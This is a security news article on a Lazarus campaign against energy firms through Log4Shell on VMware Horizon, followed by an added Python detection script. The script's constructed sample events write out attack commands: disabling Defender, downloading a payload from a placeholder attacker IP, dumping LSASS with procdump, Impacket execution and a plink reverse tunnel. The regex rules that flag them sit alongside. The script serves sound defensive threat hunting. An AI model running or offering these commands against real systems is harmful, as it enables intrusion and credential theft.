Latest Lazarus Campaign Targets Energy Companies
Log4Shell Vulnerability on VMware Horizon Servers Exploited
The Lazarus Group, a North Korean advanced persistent threat gang, recently targeted energy companies in Canada, the U.S. and Japan to establish long-term access into victim networks to conduct espionage operations by deploying custom-built malware implants.
Cisco Talos researchers tracking the latest campaign found that the threat actors exploited vulnerabilities in VMware Horizon to gain an initial foothold in the targeted organizations, then deployed the group's custom-built malware implants VSingle and YamaBot, along with a previously unknown implant dubbed MagicRAT.
Researchers say the campaign's goal is to establish long-term access into victim networks and siphon off proprietary intellectual property from the unnamed energy companies.
The malicious activity was spotted between February and July 2022. Threat actors exploited the Log4Shell vulnerability on VMware Horizon public-facing servers in a few campaigns as the initial attack vector (see: Log4Shell Update: VMware Horizon Targeted).
Two of the RATs identified by the researchers, VSingle and YamaBot, are known to be developed and distributed by Lazarus: Japan's CERT had already published details about them and attributed the campaigns using them to Lazarus.
Researchers say they observed several attacks targeting multiple victims and that two specific attack instances are the most "representative of the playbooks employed by Lazarus in this campaign."
The first instance is the use of the VSingle implant, and the second is the deployment of MagicRAT alongside VSingle. A third intrusion set worth noting involved a different implant, YamaBot.
After the initial Log4Shell exploitation of public-facing VMware Horizon servers, Cisco Talos researchers say, the compromise is followed by a series of activities to establish a foothold on the systems before the attackers deploy additional malware and move laterally across the network.
During the investigation, they uncovered two different foothold payloads. In the first, the attackers abused node.exe, which ships with VMware Horizon, to run a one-liner script that opens an "interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint."
In the second, the attackers exploited vulnerabilities in VMware Horizon to launch custom PowerShell scripts on the infected endpoint via VMware's
"Since VMware Horizon is executed with administrator privileges, the attacker doesn't have to worry about elevating their privileges. After the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get network information and directory listings," the researchers say.
In the next step, the threat actors disable Windows Defender components through registry key changes, WMIC commands and PowerShell commands.
Once the AV has been shut down over the reverse shell, the attackers deploy the VSingle malware implant.
The whole deployment process involves downloading a legitimate WinRAR utility from a remote location controlled by the attackers along with an additional payload.
The additional payload downloaded to the endpoint is decompressed and consists of "the VSingle malware executable which is optionally renamed and then persisted on the endpoint by creating an auto-start service."
Cisco Talos investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety of activities such as reconnaissance, exfiltration and manual backdooring.
In one intrusion, the researchers found that the attackers initially deployed VSingle on the endpoint, but once that sample was detected they risked losing access to the enterprise. The attackers then deployed another VSingle variant to maintain access before finally switching to the YamaBot implant.
The custom-made, Go-based malware family YamaBot uses HTTP to communicate with its command-and-control servers and begins by sending preliminary system information about the infected endpoint to the C2: computer name, username and MAC address.
The implant has standard RAT capabilities: listing files and directories, sending process information to the C2, downloading files from remote locations, executing arbitrary commands on the endpoint and uninstalling itself.
Discovery of MagicRAT
In a separate victim network, Cisco Talos researchers saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of an implant.
They also observed lateral movement into other endpoints in the enterprise. "What's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems," researchers say.
After initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families, MagicRAT and VSingle, to maintain covert access.
"The attackers then started to perform Active Directory-related explorations to identify potential endpoints to laterally move into," the researchers say. "Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable."
The researchers observed the deployment of Impacket tools on certain endpoints to move laterally and establish an interactive shell, which was done manually by a human operator.
"While trying to establish interactive remote console sessions, we can see the operators making errors on the commands," the researchers say.
The attackers take their time exploring the infected machine, and whenever they find a file of interest they pack it into a .rar archive for exfiltration via one of the custom-developed implants running on the system.
The infection chains remained largely the same, but the researchers also observed optional activities that varied across intrusion attempts:
- Credential harvesting using tools such as Mimikatz and Procdump;
- Proxy tools to set up SOCKS proxies;
- Reverse tunneling tools such as PuTTY's plink.
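The playbook the article describes (Defender tampering over the reverse shell, WinRAR staging and an auto-start service for the implant, Impacket-driven lateral movement, then Mimikatz/Procdump, SOCKS proxies and plink tunnels) leaves command-line artifacts that a hunt team can pattern-match in process-creation telemetry. The following is an added example written for this page, not code from Cisco Talos or from the article: the sample events are constructed, and the exact registry key, WMIC class, service name, IPs and file paths are assumptions about what those steps look like, since the article describes them only in prose. The Impacket indicator is the well-known `\\127.0.0.1\ADMIN$\__<timestamp>` output redirection used by wmiexec/smbexec, which the article does not mention explicitly.

```python
import re

# Constructed process-creation events as (host, image, command line), in the shape
# of Sysmon Event ID 1 / Security 4688 fields. They are invented for this example,
# not Talos telemetry, and only mirror the steps the article describes in prose.
SAMPLE_EVENTS = [
    ("WS01", "reg.exe",
     r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ("WS01", "wmic.exe",
     r'wmic /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\ProgramData"'),
    ("WS01", "powershell.exe",
     "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("WS01", "powershell.exe",
     "powershell -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/rar.exe','C:\\ProgramData\\rar.exe')"),
    ("WS01", "rar.exe",
     r"C:\ProgramData\rar.exe x -p1 C:\ProgramData\p.rar C:\ProgramData\out"),
    ("WS01", "sc.exe",
     r'sc create WinLogSvc binpath= "C:\ProgramData\svc.exe" start= auto'),
    ("WS02", "procdump64.exe",
     r"procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp"),
    ("WS02", "cmd.exe",
     r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1657023011.22 2>&1"),
    ("WS02", "plink.exe",
     "plink.exe -N -R 3389:127.0.0.1:3389 -pw p4ss tunnel@203.0.113.5"),
    ("WS03", "svchost.exe", "svchost.exe -k netsvcs"),           # benign control
    ("WS03", "powershell.exe", "powershell -c Get-MpPreference"),  # benign control
]

# (technique label, pattern) pairs, matched case-insensitively against "image cmdline".
RULES = [
    # Impair defenses: the three Defender tampering channels the article lists.
    ("defender_tamper", re.compile(r"reg(\.exe)?\s+add\s+.*Windows Defender.*DisableAntiSpyware", re.I)),
    ("defender_tamper", re.compile(r"wmic(\.exe)?\s+.*root\\Microsoft\\Windows\\Defender", re.I)),
    ("defender_tamper", re.compile(r"Set-MpPreference\s+-Disable\w+|Uninstall-WindowsFeature\s+.*Windows-Defender", re.I)),
    # Tool staging: WinRAR (or any payload) fetched from attacker infrastructure.
    ("remote_download", re.compile(r"DownloadFile\(|DownloadString\(|Invoke-WebRequest|certutil(\.exe)?\s+.*-urlcache", re.I)),
    # Archive extraction of the downloaded payload with WinRAR.
    ("archive_staging", re.compile(r"\b(rar|winrar)(\.exe)?\s+[xe]\b", re.I)),
    # Persistence: the implant registered as an auto-start service.
    ("autostart_service", re.compile(r"sc(\.exe)?\s+create\s+.*start=\s*auto", re.I)),
    # Credential harvesting: Procdump against LSASS, or Mimikatz sekurlsa modules.
    ("credential_dump", re.compile(r"procdump(64)?(\.exe)?\s+.*-ma\s+lsass|sekurlsa::", re.I)),
    # Impacket wmiexec/smbexec: output redirected to the ADMIN$ share with a __<ts> name.
    ("impacket_exec", re.compile(r"cmd\.exe\s+/Q\s+/c\s+.*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I)),
    # plink reverse tunnel: -R forwards a port on the remote host back into the network.
    ("reverse_tunnel", re.compile(r"plink(\.exe)?\s+.*\s-R\s+\d+:", re.I)),
]


def detect(events):
    """Return one finding per matching event: the host, technique and raw command line."""
    findings = []
    for host, image, cmdline in events:
        haystack = f"{image} {cmdline}"
        for technique, pattern in RULES:
            if pattern.search(haystack):
                findings.append({"host": host, "technique": technique, "cmdline": cmdline})
                break  # one label per event is enough for triage
    return findings


def summarize(findings):
    """Map each host to the sorted list of distinct playbook stages seen on it."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["technique"])
    return {host: sorted(stages) for host, stages in by_host.items()}


def suspicious_hosts(findings, min_stages=2):
    """Hosts where at least min_stages distinct stages co-occur.

    A lone Defender change may be an admin; Defender tampering followed by a new
    auto-start service or an LSASS dump on the same host is far harder to explain away.
    """
    return sorted(h for h, stages in summarize(findings).items() if len(stages) >= min_stages)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for host, stages in summarize(hits).items():
        print(host, stages)
    print("escalate:", suspicious_hosts(hits))
```

The per-host roll-up is the point of the example: Talos describes a chain, so scoring co-occurring stages on one host (rather than alerting on each regex) keeps the noisy single indicators, such as an administrator changing a Defender setting, from drowning the hosts where the whole playbook is unfolding. Real deployments would key the same logic on parent process (the Horizon service spawning node.exe or powershell.exe) and on the user context, which the article notes is administrator because Horizon runs with those privileges.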